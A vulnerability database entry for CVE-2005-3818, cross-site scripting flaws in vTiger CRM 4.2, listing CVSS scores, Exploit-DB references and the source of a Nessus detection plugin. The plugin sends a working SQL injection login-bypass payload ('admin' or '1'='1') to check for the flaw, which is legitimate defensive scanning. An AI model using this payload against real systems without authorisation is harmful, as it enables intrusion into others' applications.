Vulnerabilities > CVE-2005-3818 - Input Validation vulnerability in VTiger CRM

047910
CVSS 4.3 - MEDIUM
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
vtiger
nessus
exploit available
NVD
Published: 2005-11-26
Updated: 2018-10-19

Summary

Multiple cross-site scripting (XSS) vulnerabilities in vTiger CRM 4.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) various input fields, including the contact, lead, and first or last name fields, (2) the record parameter in a DetailView action in the Leads module for index.php, (3) the $_SERVER['PHP_SELF'] variable, which is used in multiple locations such as index.php, and (4) aggregated RSS feeds in the RSS aggregation module.

Vulnerable Configurations

Part Description Count
Application
Vtiger
20

Exploit-Db

  • descriptionvtiger CRM 4.2 RSS Aggregation Module Feed XSS. CVE-2005-3818. Webapps exploit for php platform
    idEDB-ID:26585
    last seen2016-02-03
    modified2005-11-24
    published2005-11-24
    reporterChristopher Kunz
    sourcehttps://www.exploit-db.com/download/26585/
    titlevtiger CRM 4.2 RSS Aggregation Module Feed XSS
  • descriptionvtiger CRM 4.2 Leads Module record Parameter XSS. CVE-2005-3818. Webapps exploit for php platform
    idEDB-ID:26584
    last seen2016-02-03
    modified2005-11-24
    published2005-11-24
    reporterChristopher Kunz
    sourcehttps://www.exploit-db.com/download/26584/
    titlevtiger CRM 4.2 Leads Module record Parameter XSS

Nessus

NASL familyCGI abuses
NASL idVTIGER_FLAWS.NASL
descriptionThe remote version of this software is prone to arbitrary code execution, directory traversal, SQL injection (allowing authentication bypass), cross-site scripting attacks.
last seen2020-06-01
modified2020-06-02
plugin id20317
published2005-12-16
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/20317
titlevTiger < 4.5a2 Multiple Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(20317);
  script_version("1.19");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

  script_cve_id("CVE-2005-3818", "CVE-2005-3819", "CVE-2005-3820", "CVE-2005-3821", "CVE-2005-3822", "CVE-2005-3823", "CVE-2005-3824");
  script_bugtraq_id(15562, 15569);

  script_name(english:"vTiger < 4.5a2 Multiple Vulnerabilities");
  script_summary(english:"Checks for authentication bypass in vTiger");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple flaws.");
  script_set_attribute(attribute:"description", value:
"The remote version of this software is prone to arbitrary code
execution, directory traversal, SQL injection (allowing authentication
bypass), cross-site scripting attacks.");
  script_set_attribute(attribute:"see_also", value:"http://www.hardened-php.net/advisory_232005.105.html");
  script_set_attribute(attribute:"see_also", value:"https://www.sec-consult.com/files/20051125_vtiger_crm.txt");
  script_set_attribute(attribute:"solution", value:"Upgrade to vtiger 4.5 alpha 2 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  script_set_attribute(attribute:"plugin_publication_date", value:"2005/12/16");
  script_set_attribute(attribute:"vuln_publication_date", value:"2005/11/24");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2005-2020 Tenable Network Security, Inc.");
  script_family(english:"CGI abuses");

  script_dependencie("http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

port = get_http_port(default:80, embedded:TRUE);
if (get_kb_item("Services/www/"+port+"/embedded")) exit(0);
if (! can_host_php(port:port) ) exit(0);

# Loop through various directories.
if (thorough_tests) dirs = list_uniq(make_list("/tigercrm", "/crm", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  res = http_get_cache_ka(item:string(dir, "/index.php"), port:port);
  if (isnull(res)) exit(0);

  # If it looks like vtiger...
  if (
    'HREF="include/images/vtigercrm_icon.ico">' >< res ||
    "vtiger.com is not affiliated with nor endorsed by" >< res
  ) {

    filename = string(dir, "/index.php");
    variables = string("module=Users&action=Authenticate&return_module=Users&return_action=Login&user_name=admin%27+or+%271%27%3D%271&user_password=test&login_theme=blue&login_language=en_us&Login=++Login++");
    host=get_host_name();
    req = string(
      "POST ", filename, " HTTP/1.0\r\n", 
      "Referer: ","http://", host, filename, "\r\n",
      "Host: ", host, ":", port, "\r\n", 
      "Content-Type: application/x-www-form-urlencoded\r\n", 
      "Content-Length: ", strlen(variables), 
      "\r\n\r\n", 
      variables
    );
    result = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (isnull(result)) exit(0);

    if(
      # Link to My Account
      "?module=Users&action=DetailView&record=" >< result ||
      "New Contact" >< result
    ) {
      security_hole(port);
      set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
      set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
      exit(0);
    }
  }
}

References